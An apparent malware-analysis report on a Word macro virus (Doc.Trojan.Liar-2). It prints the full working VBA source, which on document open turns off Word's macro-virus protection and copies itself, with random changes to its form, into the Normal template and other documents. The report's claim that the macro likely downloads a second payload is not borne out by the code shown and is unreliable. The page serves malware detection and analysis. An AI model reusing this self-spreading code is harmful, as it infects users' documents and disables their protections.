Office (OLE) malware analysis — malicious · b40aec67ff35c9e1

MALICIOUS

Office (OLE)

28.5 KB Created: 1999-08-06 20:13:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: c9de83e4b7c9f8ad8b9c2f00da53322a SHA-1: 05cae2ef93218d4c8c18cf4f4b1b1323fcd3459d SHA-256: b40aec67ff35c9e138fc7ea347ebad216fe57369fa8af25d7c15be0ff50e62ea

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro that is triggered by the Document_Open event. The macro appears to be obfuscated and attempts to modify the document's code, likely to download and execute a secondary payload. The ClamAV detection name 'Doc.Trojan.Liar-2' further supports its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Liar-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Liar-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7379 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7379 bytes
SHA-256: `28037a4ab6c230e3ef013a84b24a0b4a86602cc17fdd6e95b6da8a25ab333867`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Rem Do you see what I see? Do you hear what I hear?' Rem Do you feel what I feel?' Rem Do you ever cared?' Rem -jackie twoflower-' Private Sub Document_Open() ' On Error Resume Next ' Dim Bm630(175): Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0) ' Set Cf546 = MacroContainer.VBProject: Set Ll729 = Cf546.VBComponents(1) ' Set De594 = Ll729.CodeModule: Set Jh11 = NormalTemplate: Li495 = Chr(39) ' If MacroContainer = Jh11 Then Set Jh11 = ActiveDocument ' Set Vu944 = Jh11.VBProject.VBComponents(1).CodeModule: Eo654 = De594.CountOfLines: Tt963 = 100 + Int(Rnd * 50) ' For No220 = 1 To Eo654: Su942 = "": Di568 = Int(Rnd * 4): Qp530 = InStr(De594.Lines(No220, 1), Li495) ' If Qp530 = 1 And Eo654 > Tt963 Then ' Di568 = 1: GoTo Eq83 ' End If ' Dg903 = UCase(Left(De594.Lines(No220, 1), (Qp530 - 1))) ' For Uv117 = 1 To Len(Dg903): Gx417 = Mid(Dg903, Uv117, 1) ' If Asc(Gx417) < 90 And Asc(Gx417) > 65 Then Gx417 = Chr(Asc(Gx417) + Int(Rnd * 2) * 32) ' Bm630(No220) = Bm630(No220) & Gx417: Next Uv117 ' For Gr444 = 1 To Int(75 - Int(Rnd * 20)): Su942 = Su942 & Chr(255 - Int(Rnd * 100)): Next Gr444 ' Bm630(No220) = Bm630(No220) & Li495 & Su942 ' If Di568 = 2 Then Bm630(No220) = Bm630(No220) & vbCr & Li495 & Su942 ' Ut894 = Ut894 & Bm630(No220) & vbCr ' Eq83: ' Next No220 ' If Vu944.CountOfLines < (0 + 2) Then ' Vu944.DeleteLines 1, Vu944.CountOfLines: Vu944.AddFromString Ut894 ' If Jh11 = ActiveDocument Then ActiveDocument.SaveAs ActiveDocument.FullName ' End If ' End Sub ' Rem Another macro bug by jackie twoflower's Class Macro Kit v1.0' ' Processing file: /opt/analyzer/scan_staging/94cd2933052b49ffa2f677db364b26dc.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 3680 bytes ' Line #0: ' Rem 0x0031 " Do you see what I see? Do you hear what I hear?'" ' Line #1: ' Rem 0x001A " Do you feel what I feel?'" ' Line #2: ' Rem 0x0014 " Do you ever cared?'" ' Line #3: ' Rem 0x002E " -jackie twoflower-'" ' Line #4: ' FuncDefn (Private Sub Document_Open()) ' QuoteRem 0x001B 0x0000 "" ' Line #5: ' OnError (Resume Next) ' QuoteRem 0x0014 0x0000 "" ' Line #6: ' Dim ' OptionBase ' LitDI2 0x00AF ' VarDefn Bm630 ' BoS 0x0000 ' Ld Rnd ' LitDI2 0x0000 ' Mul ' Paren ' Ld Options ' MemSt VirusProtection ' BoS 0x0000 ' Ld Rnd ' LitDI2 0x0000 ' Mul ' Paren ' Ld Options ' MemSt SaveNormalPrompt ' QuoteRem 0x0058 0x0000 "" ' Line #7: ' SetStmt ' Ld MacroContainer ' MemLd VBProject ' Set Cf546 ' BoS 0x0000 ' SetStmt ' LitDI2 0x0001 ' Ld Cf546 ' ArgsMemLd VBComponents 0x0001 ' Set Ll729 ' QuoteRem 0x0047 0x0000 "" ' Line #8: ' SetStmt ' Ld Ll729 ' MemLd CodeModule ' Set De594 ' BoS 0x0000 ' SetStmt ' Ld NormalTemplate ' Set Jh11 ' BoS 0x0000 ' LitDI2 0x0027 ' ArgsLd Chr 0x0001 ' St Li495 ' QuoteRem 0x0048 0x0000 "" ' Line #9: ' Ld MacroContainer ' Ld Jh11 ' Eq ' If ' BoSImplicit ' SetStmt ' Ld ActiveDocument ' Set Jh11 ' EndIf ' QuoteRem 0x0037 0x0000 "" ' Line #10: ' SetStmt ' LitDI2 0x0001 ' Ld Jh11 ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set Vu944 ' BoS 0x0000 ' Ld De594 ' MemLd CountOfLines ' St Eo654 ' BoS 0x0000 ' LitDI2 0x0064 ' Ld Rnd ' LitDI2 0x0032 ' Mul ' FnInt ' Add ' St Tt963 ' QuoteRem 0x006E 0x0000 "" ' Line #11: ' StartForVariable ' Ld No220 ' EndForVariable ' LitDI2 0x0001 ' Ld Eo654 ' For ' BoS 0x0000 ' LitStr 0x0000 "" ' St Su942 ' BoS 0x0000 ' Ld Rnd ' LitDI2 0x0004 ' Mul ' FnInt ' St Di568 ' BoS 0x0000 ' Ld No220 ' LitDI2 0x0001 ' Ld De594 ' ArgsMemLd Lines 0x0002 ' Ld Li495 ' FnInStr ' St Qp53 ... (truncated)

SHA-256: 28037a4ab6c230e3ef013a84b24a0b4a86602cc17fdd6e95b6da8a25ab333867

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Rem Do you see what I see? Do you hear what I hear?'
Rem Do you feel what I feel?'
Rem Do you ever cared?'
Rem                           -jackie twoflower-'
Private Sub Document_Open() '
On Error Resume Next '
Dim Bm630(175): Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0) '
Set Cf546 = MacroContainer.VBProject: Set Ll729 = Cf546.VBComponents(1) '
Set De594 = Ll729.CodeModule: Set Jh11 = NormalTemplate: Li495 = Chr(39) '
If MacroContainer = Jh11 Then Set Jh11 = ActiveDocument '
Set Vu944 = Jh11.VBProject.VBComponents(1).CodeModule: Eo654 = De594.CountOfLines: Tt963 = 100 + Int(Rnd * 50) '
For No220 = 1 To Eo654: Su942 = "": Di568 = Int(Rnd * 4): Qp530 = InStr(De594.Lines(No220, 1), Li495) '
If Qp530 = 1 And Eo654 > Tt963 Then '
Di568 = 1: GoTo Eq83 '
End If '
Dg903 = UCase(Left(De594.Lines(No220, 1), (Qp530 - 1))) '
For Uv117 = 1 To Len(Dg903): Gx417 = Mid(Dg903, Uv117, 1) '
If Asc(Gx417) < 90 And Asc(Gx417) > 65 Then Gx417 = Chr(Asc(Gx417) + Int(Rnd * 2) * 32) '
Bm630(No220) = Bm630(No220) & Gx417: Next Uv117 '
For Gr444 = 1 To Int(75 - Int(Rnd * 20)): Su942 = Su942 & Chr(255 - Int(Rnd * 100)): Next Gr444 '
Bm630(No220) = Bm630(No220) & Li495 & Su942 '
If Di568 = 2 Then Bm630(No220) = Bm630(No220) & vbCr & Li495 & Su942 '
Ut894 = Ut894 & Bm630(No220) & vbCr '
Eq83: '
Next No220 '
If Vu944.CountOfLines < (0 + 2) Then '
Vu944.DeleteLines 1, Vu944.CountOfLines: Vu944.AddFromString Ut894 '
If Jh11 = ActiveDocument Then ActiveDocument.SaveAs ActiveDocument.FullName '
End If '
End Sub '
Rem Another macro bug by jackie twoflower's Class Macro Kit v1.0'

' Processing file: /opt/analyzer/scan_staging/94cd2933052b49ffa2f677db364b26dc.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3680 bytes
' Line #0:
' 	Rem 0x0031 " Do you see what I see? Do you hear what I hear?'"
' Line #1:
' 	Rem 0x001A " Do you feel what I feel?'"
' Line #2:
' 	Rem 0x0014 " Do you ever cared?'"
' Line #3:
' 	Rem 0x002E "                           -jackie twoflower-'"
' Line #4:
' 	FuncDefn (Private Sub Document_Open())
' 	QuoteRem 0x001B 0x0000 ""
' Line #5:
' 	OnError (Resume Next) 
' 	QuoteRem 0x0014 0x0000 ""
' Line #6:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x00AF 
' 	VarDefn Bm630
' 	BoS 0x0000 
' 	Ld Rnd 
' 	LitDI2 0x0000 
' 	Mul 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' 	BoS 0x0000 
' 	Ld Rnd 
' 	LitDI2 0x0000 
' 	Mul 
' 	Paren 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' 	QuoteRem 0x0058 0x0000 ""
' Line #7:
' 	SetStmt 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	Set Cf546 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld Cf546 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set Ll729 
' 	QuoteRem 0x0047 0x0000 ""
' Line #8:
' 	SetStmt 
' 	Ld Ll729 
' 	MemLd CodeModule 
' 	Set De594 
' 	BoS 0x0000 
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set Jh11 
' 	BoS 0x0000 
' 	LitDI2 0x0027 
' 	ArgsLd Chr 0x0001 
' 	St Li495 
' 	QuoteRem 0x0048 0x0000 ""
' Line #9:
' 	Ld MacroContainer 
' 	Ld Jh11 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set Jh11 
' 	EndIf 
' 	QuoteRem 0x0037 0x0000 ""
' Line #10:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld Jh11 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Vu944 
' 	BoS 0x0000 
' 	Ld De594 
' 	MemLd CountOfLines 
' 	St Eo654 
' 	BoS 0x0000 
' 	LitDI2 0x0064 
' 	Ld Rnd 
' 	LitDI2 0x0032 
' 	Mul 
' 	FnInt 
' 	Add 
' 	St Tt963 
' 	QuoteRem 0x006E 0x0000 ""
' Line #11:
' 	StartForVariable 
' 	Ld No220 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Eo654 
' 	For 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St Su942 
' 	BoS 0x0000 
' 	Ld Rnd 
' 	LitDI2 0x0004 
' 	Mul 
' 	FnInt 
' 	St Di568 
' 	BoS 0x0000 
' 	Ld No220 
' 	LitDI2 0x0001 
' 	Ld De594 
' 	ArgsMemLd Lines 0x0002 
' 	Ld Li495 
' 	FnInStr 
' 	St Qp53
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.